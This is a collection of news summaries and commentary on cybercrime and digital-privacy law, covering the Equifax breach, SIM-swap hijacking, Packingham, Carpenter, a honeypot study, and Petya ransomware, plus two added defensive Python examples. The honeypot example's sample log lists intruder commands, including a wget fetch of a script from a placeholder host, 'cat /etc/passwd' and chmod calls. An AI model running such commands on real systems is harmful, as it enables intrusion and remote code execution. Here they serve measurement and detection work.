Richard Smith, 57, had led the firm since 2005 and was widely admired on Wall Street. He had been under the spotlight since news broke of an Equifax data breach that exposed the personal information of as many as 143 million people.
The chairman and chief executive of Equifax, Richard F. Smith, retired on Tuesday in the aftermath of a major data breach that exposed the personal information of as many as 143 million people, says the New York Times. Two other top Equifax executives — the chief information officer and the chief security officer — stepped down on Sept. 14. Equifax, based in Atlanta, said this month that hackers had exploited an unpatched flaw in its website software to extract names, Social Security numbers, birth dates, addresses and other information about millions of people. The company faced a blistering outcry from lawmakers and the public for failing to protect the sensitive data and for a response that many found lackluster.
Smith, 57, had been the chairman and chief executive of Equifax Inc. since 2005. He joined the company after a 22-year career at General Electric that included top executive positions in the conglomerate’s insurance, leasing and asset-management divisions. Before the data breach at Equifax, Smith was widely admired on Wall Street for developing new products and increasing sales. Equifax had revenue of $3.1 billion last year, up from $1.4 billion the year he took over. Federal authorities, led by the F.B.I., have opened a criminal investigation into the cyberattack on Equifax. More than 30 state attorneys general have begun investigations into the breach, and federal lawmakers from both parties have requested information from Equifax and called for hearings on what went wrong.
The Atlanta-based credit reporting agency said hackers exploited a “website application vulnerability” and got sensitive personal data including Social Security numbers, birth dates, and home addresses.
The credit reporting agency Equifax said hackers gained access to sensitive personal data — Social Security numbers, birth dates and home addresses — for up to 143 million people. The Washington Post calls it a major cybersecurity breach at a firm that serves as one of the three major clearinghouses for Americans’ credit histories. Equifax said the breach began in May and continued until it was discovered in late July. It said hackers exploited a “website application vulnerability” and obtained personal data about British and Canadian consumers as well as Americans. Social Security numbers and birth dates give those who possess them the ingredients for identity fraud and other crimes.
Equifax also lost control of an unspecified number of driver’s licenses, along with the credit card numbers for 209,000 consumers and credit dispute documents for 182,000 others. The company said it did not detect intrusions into its “core consumer or commercial credit reporting databases.” “The type of information that has been exposed is really sensitive,” said Beth Givens of the Privacy Rights Clearinghouse, a consumer advocacy group based in San Diego. “All in all, this has the potential to be a very harmful breach to those who are affected by it.” Equifax, based in Atlanta, is working with law enforcement on an investigation of the breach and has hired an independent cybersecurity research firm to assess the scope of the intrusion.
Hackers are finding a lucrative market in stealing mobile phone numbers and resetting passwords on every account that uses the number as a security backup. The Federal Trade Commission had reports of 2,658 such incidents as of January 2016.
Hackers have discovered that mobile phone numbers are easy to steal. In a growing number of online attacks, hackers have been calling up Verizon, T-Mobile U.S., Sprint and AT&T and asking them to transfer control of a victim’s phone number to a device under the control of the hackers, the New York Times reports. Once they get control of the phone number, they can reset the passwords on every account that uses the phone number as a security backup, as services like Google, Twitter and Facebook suggest. A wide array of people have complained about being successfully targeted, including a Black Lives Matter activist and the chief technologist of the Federal Trade Commission. The commission’s own data shows that the number of so-called phone hijackings has been rising. In January 2013, there were 1,038 such incidents reported; by January 2016, that number had increased to 2,658.
One user of virtual currency said hackers changed the password on his virtual currency wallet and drained about $150,000. “Everybody I know in the cryptocurrency space has gotten their phone number stolen,” said Joby Weeks, a Bitcoin entrepreneur. The attackers appear to be focusing on anyone who talks on social media about owning virtual currencies or anyone who is known to invest in virtual currency companies, such as venture capitalists. The attacks are exposing a vulnerability that could be exploited against almost anyone with valuable emails or other digital files. Last year, hackers took over the Twitter account of Black Lives Matter leader DeRay Mckesson by first getting his phone number. In cases involving digital money aficionados, the attackers have held email files for ransom — threatening to release naked pictures in one case, and details of a victim’s sexual fetishes in another.
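The attack pattern the Times describes leaves a recognisable trace in a service's own audit log: the recovery phone number changes, and minutes later a password reset is authorised by SMS to that new number, often with the same attacker-controlled number turning up on several accounts. As an added example (not part of the Times report or of any service's code), the Python below runs those two detection rules over a constructed audit log. The event names, user names and phone numbers are assumptions made for the example.

```python
"""Detection rules for phone-number hijacking followed by SMS password resets.

The audit events below are a constructed sample, not data from any real
service; field names and values are assumptions made for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample audit log: (timestamp, user, event, detail).
# "recovery_phone_changed" carries the new number; "password_reset" carries
# the factor that authorised the reset ("sms", "totp", "backup_code").
SAMPLE_EVENTS = [
    ("2017-08-01T09:00:00", "alice", "recovery_phone_changed", "+15550001111"),
    ("2017-08-01T09:07:00", "alice", "password_reset", "sms"),
    ("2017-08-01T09:20:00", "bob", "recovery_phone_changed", "+15550001111"),
    ("2017-08-01T09:26:00", "bob", "password_reset", "sms"),
    ("2017-07-20T12:00:00", "carol", "recovery_phone_changed", "+15550002222"),
    ("2017-08-01T15:00:00", "carol", "password_reset", "totp"),
    ("2017-08-01T16:00:00", "dave", "password_reset", "sms"),
]


def parse_events(events):
    """Return events ordered by time with timestamps parsed to datetime."""
    return sorted(
        (datetime.fromisoformat(ts), user, ev, detail) for ts, user, ev, detail in events
    )


def sms_resets_after_phone_change(events, window=timedelta(hours=24)):
    """Rule 1: an SMS-authorised password reset within `window` of the
    recovery phone number being changed on the same account.

    Returns [(user, minutes_between_change_and_reset), ...].
    """
    last_change = {}
    hits = []
    for ts, user, ev, detail in parse_events(events):
        if ev == "recovery_phone_changed":
            last_change[user] = ts
        elif ev == "password_reset" and detail == "sms":
            changed_at = last_change.get(user)
            if changed_at is not None and ts - changed_at <= window:
                hits.append((user, int((ts - changed_at).total_seconds() // 60)))
    return hits


def shared_recovery_numbers(events, min_accounts=2):
    """Rule 2: the same recovery number attached to several accounts, which is
    what an attacker re-using a number they control looks like.

    Returns {number: [users...]} for numbers on at least `min_accounts` accounts.
    """
    users_by_number = defaultdict(set)
    for _, user, ev, detail in parse_events(events):
        if ev == "recovery_phone_changed":
            users_by_number[detail].add(user)
    return {n: sorted(u) for n, u in users_by_number.items() if len(u) >= min_accounts}


def alerts(events):
    """Combine both rules into human-readable alert lines."""
    lines = [f"{user}: SMS reset {mins} min after recovery phone change"
             for user, mins in sms_resets_after_phone_change(events)]
    for number, users in shared_recovery_numbers(events).items():
        lines.append(f"{number}: recovery number shared by {', '.join(users)}")
    return lines


if __name__ == "__main__":
    for line in alerts(SAMPLE_EVENTS):
        print(line)
```

On the sample log, alice and bob trip the first rule (resets 7 and 6 minutes after a number change) and their shared new number trips the second; carol's reset used TOTP and dave never changed his number, so neither fires. The second rule on its own also catches households that legitimately share a phone, so in practice it is a score contributor rather than a blocking rule, and the stronger fix is the one the article implies: stop treating SMS as a sufficient sole factor for password reset at all.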
A Supreme Court ruling in June overruled the conviction of a sex offender for violating his probation after posting on Facebook. But that opens up a new legal minefield over limitations on internet access for anyone convicted of a crime, warns a Washington, DC attorney.
Court-imposed web restrictions applied to criminal defendants may be going the way of dial-up internet service.
In June, the Supreme Court issued a unanimous ruling in Packingham v. North Carolina that invalidated a state law banning registered sex offenders from accessing websites that could facilitate direct communications with minors.
While the majority opinion and concurrence seem grounded in—and specific to—sex offender restrictions, the evolving communications technology that operates in cyberspace today suggests that the ruling will have an impact on attempts to restrict web access for all criminal defendants in state or federal courts.
Lester Packingham pleaded guilty to having sex with a 13-year-old girl when he was 21. Eight years after his conviction, Lester bragged on Facebook about a happy day in traffic court, using the screen name of J.R. Gerrard, and exclaiming:
“Man God is Good! How about I got so much favor they dismissed the ticket before court even started? No fine, no court cost, no nothing spent…Praise be to GOD, WOW! Thanks JESUS!”
A police officer tracked down court records, obtained a search warrant, and correctly identified “J.R.” as an alias for Lester Packingham.
He was subsequently convicted of violating a North Carolina statute that prohibits convicted sex offenders from using social-networking websites, such as Facebook and Twitter. The unanimous Supreme Court opinion, written by Justice Anthony Kennedy, reversed the conviction on First Amendment free speech grounds.
According to Kennedy, the North Carolina statute was too broad, in that it effectively prevented sex offenders from accessing the “vast democratic forums of the Internet” that serve as principal sources of information on employment opportunities, current events, and opinions or ideas that have no connection to criminal plans or the potential victimization of children.
Justice Samuel Alito agreed, pointing out that the statute’s definition of social networking sites would in effect encompass even Amazon, the Washington Post, and WebMD—all of which provide opportunities for visitors to connect with other users. In his concurrence, he noted that states were entitled to draft narrower, and constitutionally valid, restrictions because of their legitimate interest in thwarting recidivist sex offenders.
But it’s not at all clear that a state legislature can follow Justice Alito’s guidance and sufficiently narrow its sights on offender/child communication to the point where the law has its intended effect, while still passing constitutional muster.
There may well be pedophiliac versions of Tinder or Match.com which could fit the definitions of sites where access can be restricted without harm to First Amendment protections. But today’s internet does not lend itself easily to such narrow definitions. Even mainstream sites like The Washington Post or Amazon could be considered portals that might be compromised by criminal behavior. Such sites encourage the kind of user engagement that, while it may not fairly be called a “chat room,” is close enough to a “bulletin board” to bring us right back into the perils of North Carolina’s now-invalidated law.
And what of the defendants facing internet restrictions for reasons other than molestation or child pornography violations?
There are numerous defendants who are bounced off the internet as a condition of probation or supervised release because the internet was an instrumentality for their crimes. For instance, internet-based fraud, identity theft, or using pro-terrorism websites to construct weapons or murderous plans, are all offenses that have led judges to impose some form of web restriction on defendants.
Web restrictions for these defendants are now also in play in a post-Packingham world.
The intention of the judges seeking to restrict web access in these cases is understandable. They want to remove potential tools of victimization from the hands of convicted criminals. But the Supreme Court’s recognition of the vast, evolving and multi-purpose nature of today’s internet has brought legitimate First Amendment considerations into almost every web-limiting decision.
We may soon see that the only web restrictions that are lawful and practically enforceable are ones stemming from the defendant volunteering to withdraw from the net—likely because of the perceived trade-off between more time in jail and the judge’s comfort level as to assurances that re-victimization by internet will not occur when the defendant is returned to the community.
In the meantime, Packingham may shape the battlefield when web-restricted defendants are alleged to have violated parole or probation by visiting websites. Judges facing considerably more ominous violations than Lester’s on-line celebration of beating a traffic ticket may find that website-messaging technology and powerful First Amendment concerns leave them with little recourse but to ban outright all attempts to restrict access.
To some, this may be an uncomfortably high price to pay for web freedom.
On a practical level, technology has largely out-paced the now-antiquated view that the Internet can be surgically sliced into “safe” websites and “unsafe” ones, and the unanimity of Packingham suggests that the Court did not struggle much with its rationale.
While the absence of web-restrictions would lead to the release of offenders to the community with an unavoidable dose of discomfort with their access to computers, it may also result in judges finding themselves increasingly satisfied with lengthy prison terms because of the lack of a satisfactory, less-restrictive condition of supervised release.
So, somewhat ironically, the next Lester Packingham may find himself spending more time in prison because of his inability to convince a judge that self-restraint on the computer can adequately replace judicially-imposed restraints.
Perhaps the safer bet here is on technology – that some program, some application, or some web-alternative pops up in the future and revitalizes the possibility of judges restricting web access without violating First Amendment rights.
James Trusty is a Member at Ifrah Law, PLLC, where he leads the White Collar Practice Group. He was formerly Chief of the Department of Justice Organized Crime & Gang Section, and has spent 27 years serving as either a local or federal prosecutor. He also teaches criminal justice courses at University of Maryland (Shady Grove). He welcomes comments from readers.
A case before the Supreme Court next month could decide whether constitutional protections against warrantless searches prevent courts and law enforcement from using evidence discovered from cellphone records, says a former NYC prosecutor.
Most people know that very little they do on the web is private. The terabytes of data held online contain personal information accessible not only to friends, relatives and would-be employers, but to private businesses, which frequently collect user information in order to deliver better services to customers.
Can the government see it too?
In 1979, the Supreme Court ruled in Smith v. Maryland that Fourth Amendment protections against warrantless searches do not cover information a person has turned over to a “third party” (in that case, the telephone numbers a suspect dialed, recorded by the phone company at police request). In what has since developed into the “Third Party Doctrine,” the court held that an individual has no legitimate expectation of privacy in information voluntarily given to a third party—be it a person, bank, or phone carrier—and that such information is therefore also available to government agencies without a warrant.
But what are government agencies, such as law enforcement, constitutionally permitted to do with the data they collect? A case before the Court next month may help answer the question.
Carpenter v. United States has the potential to affect application of the Fourth Amendment’s Third Party Doctrine in the digital age.
The case involves a string of robberies, allegedly organized by the defendant, Timothy Carpenter, which occurred over a two-year period. Police acquired cell site location information (CSLI) associated with the phone he used. Although no search warrant was ever obtained, a judge did sign a court order under the Stored Communications Act, a statute that requires reasonable suspicion, not probable cause.
The CSLI records revealed Carpenter’s location and movements over 127 days and showed that during the five-month period his phone was in communication with cell towers near the crime scenes.
Although there is a tendency to read Smith v. Maryland as a blanket rule, where anything given to or accessed by a third party has no Fourth Amendment interest, it doesn’t make sense to apply a doctrine created over 30 years ago to types of communications and data that were neither used at the time nor contemplated by the Court.
“Given how much [of] our data goes through third parties, if you take a strong reading of the Doctrine, it essentially wipes out Fourth Amendment protections for most modern communications,” Michael Price, Senior Counsel for the Liberty and National Security Program at New York University’s Brennan Center for Justice, told me.
“There is also nothing about location information in Smith. To rely on it, and say that location information should be accessible without a warrant, is reading the case far too broadly.”
Price’s point is an important one.
To analogize cases is to suggest they should be treated the same under the law and receive the same level of protection. Although the facts may specifically involve cell-site information, Carpenter is about more than just location privacy. Here, as is increasingly the case with Internet-of-Things-based prosecutions, a third-party server already had access to the sought after location data.
Carpenter presents the first chance for the Court to reconsider Fourth Amendment protections against warrantless searches and seizures of information generated and collected by the many modern technologies we use every day.
This is an opportunity at least one Supreme Court Justice has recognized.
In 2012, the Court resolved the issue of location privacy in United States v. Jones, holding that installation of a Global Positioning System (GPS) tracking device on a vehicle and using it to monitor the vehicle’s movements constitutes a search under the Fourth Amendment. In her concurrence, Justice Sonia Sotomayor wrote that the current approach to these cases is “ill-suited to the digital age, in which people reveal a great deal of information about themselves to third parties in the course of carrying out mundane tasks.”
She suggested it may need to be rethought in the future.
There are signs from recent cases, like Jones, that the Justices are aware of the importance of technology in contemporary life. They appear to recognize that technology is significantly different today than it was ten years ago, let alone when the Court was deciding cases like Smith.
Riley v. California was the first time the Supreme Court identified the central role that cellphones have in today’s society, holding that police need a warrant to search a smart phone belonging to a person who has been arrested. Writing for the majority in 2014, Chief Justice John Roberts said that cell phones have “such a pervasive and insistent part of daily life that the proverbial visitor from Mars might conclude they were an important feature of human anatomy.”
The Riley Court went on to say that cellular phones have become essential to freedom of speech and First Amendment rights and, due to the volume and personal nature of the information that can be stored on a cellphone, the data should be presumptively protected from warrantless search under the Fourth Amendment. The decision notes that a cell phone can double as a diary, camera, calendar, or newspaper, which makes the search of one fundamentally different from a physical search or even a search of business records.
“This is an important decision, in terms of First Amendment protections, showcasing the Supreme Court’s comfort with new technology and that it is cognizant of the impact of digital information,” said Andrew Ferguson of the David A. Clarke School of Law at the University of District Columbia, and a national expert on predictive policing and the Fourth Amendment,
Similarly, earlier this year, the Court decided Packingham v. North Carolina, which addressed the prevalence and necessity of the internet and social media in a digitized society.
Riley embodies the idea that new technologies and the digital space are different, yet fails to view these devices for what they are rather than what they’re most similar to. A cell phone is not a diary, calendar or any of the technologies cited by the Court, and drawing a series of slightly-off-the-mark analogies and suggesting they should be treated the same is not a solution.
In reviewing Carpenter, there are only a few scenarios for the Court—each of which will have lasting implications.
The Court might opt to temporarily put tape over the problem, hiding behind the Third Party Doctrine and wait for the next case to make its way up.
Or it could limit the Doctrine’s application to CSLI and recognize that carrying a cellular phone does not, in and of itself, amount to consenting to location tracking.
“One of the difficulties the Court is confronted with is that the Doctrine, as it’s been created, doesn’t offer a nice neat answer,” said Ferguson. “The Court may have to rethink their traditional approach to the Fourth Amendment in order to address this new technological threat to privacy and security.
“The other difficulty is: If Carpenter is really about the future of the Third Party Doctrine, it is about far more than just cell site records—it is about the future of a data-driven third party mediated age.”
That is a huge question to answer. And, due to the far-reaching consequences of any of the scenarios the Court may choose, the Court may also just decide to punt it to a future case.
There are few things we do online that aren’t connected, in some way, to a third party. As smartphone technology continues to advance, more and more aspects of our lives will be recorded and stored on third-party servers. Lower courts across the country are only just beginning to consider how the Internet of Things will affect our expectations of privacy.
Carpenter is an opportunity for the Supreme Court to reconceive how privacy and security values can be protected in an era of increasingly sophisticated surveillance technologies that allow us to remotely control the lights and heat in our homes or monitor intruders.
Let’s hope the Justices take it.
Deanna Paul (@thedeannapaul) is a former New York City prosecutor and adjunct professor of trial advocacy at Fordham University School of Law. This fall she will begin attending Columbia University’s graduate school of journalism. Her nonfiction work has been published by The Marshall Project, Rolling Stone, and WIRED.
University of Maryland-College Park researchers set up over 200 “honeypot” computers to test whether online warnings deter cyberthieves. Quite the opposite, they found—in a study that may be a wakeup call to law enforcement.
Warnings aimed at discouraging cyberhackers have almost no effect on skilled cybercriminals, according to a University of Maryland-College Park study.
In a finding that is likely to prove discouraging to law enforcement, the study discovered that warning “banners” set to flash across screens to discourage illegal online activity actually prodded trespassers to increase their efforts to infiltrate computer networks.
Researchers set up a number of “honeypot” computer accounts at a large American university, which was not named, to lure and monitor hackers to test whether “situational deterring cues” discourage system trespassing —”one of the fastest growing, yet least understood, forms of cybercriminal activity,” according to the study, released Wednesday by Criminology & Public Policy, published by the American Society of Criminology.
The University of Maryland researchers set up a number of decoy computer accounts and during a six-month period in 2012 waited for the trespassers to arrive. And they certainly did.
The study authors—Alexander Testa, David Maimon, Bertrand Sobesto, and Michel Cukier—reported 553 unique “system trespassing events” on the 221 target computers.
Once the hackers had broken into the honeypot computers their screens flashed with an online warning banner:
The actual or attempted unauthorized access, use, or modification of this system is strictly prohibited. Unauthorized users are subject to institutional disciplinary proceedings and/or criminal and civil penalties under state, federal, or other applicable domestic and foreign laws. The use of this system is monitored and recorded for administrative and security reasons. Anyone accessing this system expressly consents to such monitoring and is advised that if such monitoring reveals possible evidence of criminal activity, the Institution may provide the evidence of such activity to law enforcement officials.
The researchers then observed and recorded the hackers’ behavior: How they navigated the attacked computer system, or changed file permissions, even after they were exposed to no-trespass warnings.
Those who had broken through the barriers to access administrator accounts—the privileged accounts that provide widespread access and the ability to wreak the maximum damage, usually held by information technology staff—didn’t appear dissuaded by the warning.
In fact, according to the researchers, hackers “increased the proportion of system trespassing events in which the ‘change file permission’ command was recorded,” compared to a control group that did not see a warning.
In a finding that they said surprised them, “sanction threats in an attacked computer system escalated the manipulation of file permission.”
In other words, the warning only apparently goaded them to keep hacking.
Some 21 percent of the hackers ferreted out by the decoy computers appear to be relative amateurs who did not attempt to crack administrative accounts, and in this group, there were signs of users being intimidated or deterred by the online warnings.
The study authors concluded that the more skilled hackers possessed “high criminal self-efficacy” and were confident in their ability to escape detection. Another possibility is that the sight of the warning banner made them react “defiantly.”
When faced with a threat, “administrative trespassers may escalate their offending in response to a sanction threat perceived as illegitimate,” the study said.
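The study’s headline measure, the proportion of trespassing events in which a change-file-permission command was recorded, split by banner versus no-banner condition and by whether the intruder held an administrative account, is straightforward to compute from honeypot session logs. The Python below is an added example written for this page, not the authors’ code or data; the session records, condition labels and commands are constructed, and the command pattern (chmod, chown, chgrp, setfacl, with or without sudo) is an assumption about what such a log contains.

```python
"""Compute the share of honeypot sessions in which a file-permission command
was run, split by whether the intruder saw a warning banner.

All session records below are constructed for this example; they are not the
study's data, and the command pattern is an assumption about log contents.
"""
import re
from collections import defaultdict

# Constructed sample: (session_id, condition, privilege, commands typed).
# condition: "banner" (warning shown) or "control" (no warning)
# privilege: "admin" (root/administrator account) or "user"
SAMPLE_SESSIONS = [
    ("s01", "banner", "admin", ["w", "cd /var/www", "chmod 777 upload.php", "ls"]),
    ("s02", "banner", "admin", ["id", "chown -R www-data /srv/app"]),
    ("s03", "banner", "admin", ["wget http://example.invalid/x.sh", "sudo chmod +x x.sh"]),
    ("s04", "banner", "admin", ["uname -a", "cat /etc/passwd"]),
    ("s05", "control", "admin", ["ls -la", "chmod 600 /root/.ssh/id_rsa"]),
    ("s06", "control", "admin", ["ps aux", "netstat -an"]),
    ("s07", "control", "admin", ["whoami", "df -h"]),
    ("s08", "control", "admin", ["last", "exit"]),
    ("s09", "banner", "user", ["ls", "exit"]),
    ("s10", "banner", "user", ["cat /etc/hosts"]),
    ("s11", "control", "user", ["cd /tmp", "chmod +x bot"]),
    ("s12", "control", "user", ["uptime"]),
]

# Assumed set of permission/ownership-changing commands, optionally via sudo.
PERM_CMD = re.compile(r"^\s*(?:sudo\s+)?(?:chmod|chown|chgrp|setfacl)\b")


def touched_permissions(commands):
    """True if any command line in the session changes file permissions/ownership."""
    return any(PERM_CMD.match(cmd) for cmd in commands)


def permission_change_rate(sessions, privilege=None):
    """Return {condition: (sessions_with_change, total_sessions, proportion)}.

    `privilege` restricts the calculation to admin or user sessions, matching
    the study's split between administrative and non-administrative trespassers.
    """
    counts = defaultdict(lambda: [0, 0])  # condition -> [with_change, total]
    for _, condition, priv, commands in sessions:
        if privilege is not None and priv != privilege:
            continue
        counts[condition][1] += 1
        if touched_permissions(commands):
            counts[condition][0] += 1
    return {c: (k, n, round(k / n, 3)) for c, (k, n) in counts.items()}


def banner_effect(sessions, privilege=None):
    """Difference in proportion (banner minus control). A positive value means
    the banner condition saw more permission changes, the direction the study
    reported for administrative trespassers."""
    rates = permission_change_rate(sessions, privilege)
    return round(rates["banner"][2] - rates["control"][2], 3)


if __name__ == "__main__":
    for priv in ("admin", "user"):
        print(priv, permission_change_rate(SAMPLE_SESSIONS, priv),
              "banner effect:", banner_effect(SAMPLE_SESSIONS, priv))
```

The constructed sample is arranged to show the shape of the study’s result (admin sessions: 3 of 4 with the banner versus 1 of 4 without; user sessions the other way round), so its numbers mean nothing on their own. The point for an operator running their own honeypot is the measurement design: a randomised control group that never sees the banner, a per-session rather than per-command count, and a split by privilege level, without which a “banners make it worse” conclusion cannot be drawn from a handful of sessions.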
The lesson for security services, say the authors, is that more stringent methods are needed to deter the kinds of cybercriminality that have resulted in the theft of thousands of individuals’ identities, credit card numbers and other private information from large corporate networks over the past several years.
While they did not rule out the use of online warnings as a deterrent, the authors recommended the development of more sophisticated strategies that employed “repeated visual and verbal cues that can be responsive to a diverse group of offenders and situations in cyberspace.”
The full study, entitled “Illegal Roaming and File Manipulation on Target Computers,” is available online from Criminology & Public Policy.
This summary was prepared by TCR Deputy Editor (Digital) Nancy Bilyeau. Readers’ comments are welcome.
In a growing menace, scammers try to extort money after phoning parents or other kin and falsely convincing them that a loved one is being held hostage. They sometimes research potential victims on social media.
Hundreds of people in Southern California have been targeted by criminals hoping to carry out a scheme that law enforcement officials have termed “virtual kidnapping for ransom,” reports the Los Angeles Times. The scammers try to extort money after phoning parents or other kin and falsely convincing them that a loved one is being held hostage. A network of criminals in the U.S. and Mexico have been making the calls since at least 2015, affecting thousands of people in several states, including California, according to Gene Kowel of the FBI in Los Angeles. Officials from the FBI, LAPD and other agencies held a press conference Tuesday to warn potential victims against succumbing to panic if they receive a similar call.
Investigators made their first arrest in connection with the scam last week. Yanette Rodriguez Acosta, 34, of Houston was indicted on charges of wire fraud and conspiracy to commit money laundering. She is charged as part of a ring that used Mexican telephone numbers to call targets in Los Angeles and Beverly Hills, claiming to hold the victims’ children as prisoners. The ring targeted at least 39 victims in California, Texas and Idaho. At least 250 calls were aimed at Los Angeles residents, costing victims roughly $114,000. Officials said some scammers research potential victims on social media.
The Trump administration’s refusal to publicly accuse Russia and others in a wave of politically motivated hacking attacks is creating a policy vacuum that security experts fear will encourage more cyber warfare. The White House “just wants ‘cyber’ to go away,” said one expert.
The Trump administration’s refusal to publicly accuse Russia and others in a wave of politically motivated hacking attacks is creating a policy vacuum that security experts fear will encourage more cyber warfare, reports Reuters. In the past three months, hackers broke into official websites in Qatar, helping to create a regional crisis; suspected North Korean-backed hackers closed down British hospitals with ransomware; and a cyber attack that researchers attribute to Russia deleted data on thousands of computers in Ukraine. Yet neither the United States nor the 29-member NATO military alliance has publicly blamed national governments for those attacks.
President Trump has refused to accept conclusions of U.S. intelligence agencies that Russia interfered in the 2016 U.S. elections using cyber warfare methods to help win. “The White House is currently embroiled in a cyber crisis of existential proportion, and for the moment probably just wants ‘cyber’ to go away, at least as it relates to politics,” said Kenneth Geers, a security researcher with NATO. “This will have unfortunate side effects for international cyber security.” With no one calling out known perpetrators, more hacking attacks are inevitable, experts say.
Ukraine’s prime minister called yesterday’s cyberattack — which targeted government workstations, power companies, banks, state-run TV stations, airports and ATMs — “unprecedented” in scope. The so-called Petya attack reboots victims’ computers, encrypts the disk’s master file table (MFT) and so renders the entire drive inoperable. The ransom request, $300 in bitcoin, “doesn’t seem consistent with state-sponsored attackers,” says one expert.
Get used to the kind of ransomware attack that crippled critical infrastructure and shut down major corporations yesterday. It was an escalation of the kind of cyber attack that’s becoming a regular occurrence worldwide with a reach that’s threatening key elements of national security, reports Axios.com. These kinds of attacks are affecting more people as they spill out of the cyber realm and affect hospitals, power grids, and multi-national corporations. At the same time, consumer anxiety about security is at an all-time high, according to the Unisys Security Index and EY’s Global Capital Confidence Barometer, which shows cybersecurity concerns are delaying business deals.
Ukraine’s prime minister, Volodymyr Groysman, called yesterday’s cyberattack — which targeted government workstations, power companies, banks, state-run TV stations, airports and ATMs — “unprecedented” in scope. The so-called Petya attack reboots victims’ computers, encrypts the disk’s master file table (MFT) and so renders the entire drive inoperable. The ransom requested for access to an infected computer is $300 in bitcoin, and “doesn’t seem consistent with state-sponsored attackers,” said Bret Padres, a former intel official and CEO of The Crypsis Group. The attack came just over a month after the massive WannaCry ransomware attack, conducted by a North Korean hacking group, which infected some 300,000 computers across 150 countries. Padres says “Eastern European systems are more likely to be running unpatched and could be more vulnerable to this type of attack,” but the “bulk of the U.S. capability in cyber security is in its offensive operations. We are in a very vulnerable place when it comes to defenses.”
Security experts say ransomware attacks are an Internet scourge, but a new FBI report suggests that the vast majority of its victims simply don’t bother reporting incidents of this growing financial cyber-menace.
Despite its expanding threat, ransomware infections are rarely reported to law enforcement agencies, according to the FBI’s latest Internet Crime Report. Bleeping Computer reports that the FBI’s Internet Crime Complaint Center (IC3) received just 2,673 complaints about ransomware attacks in 2016. Ransomware is a type of malicious software designed to block access to a computer system until a sum of money is paid. Victims who did report to the FBI said the attacks resulted in just $2.4 million in damages in 2016. But the numbers do not reflect what’s happening in the real world, where ransomware is one of today’s most prevalent cyber-threats, according to multiple reports from cyber-security companies.
Experts suggest that people and companies are paying ransoms, restoring files from backups, or reinstalling PCs without filing a complaint with authorities. Last year, the FBI reported that ransomware incidents had doubled from 2014 to 2015. In 2016, the number of ransomware complaints remained the same, despite cyber-security companies reporting an increase in activity. For example, an IBM report said email spam spreading ransomware spiked 6,000 percent in 2016, while a PhishMe report said spam delivering ransomware accounted for 37 percent of all email spam. A Carbon Black report said ransomware operators were on track to make nearly $850 million from ransom payments this year.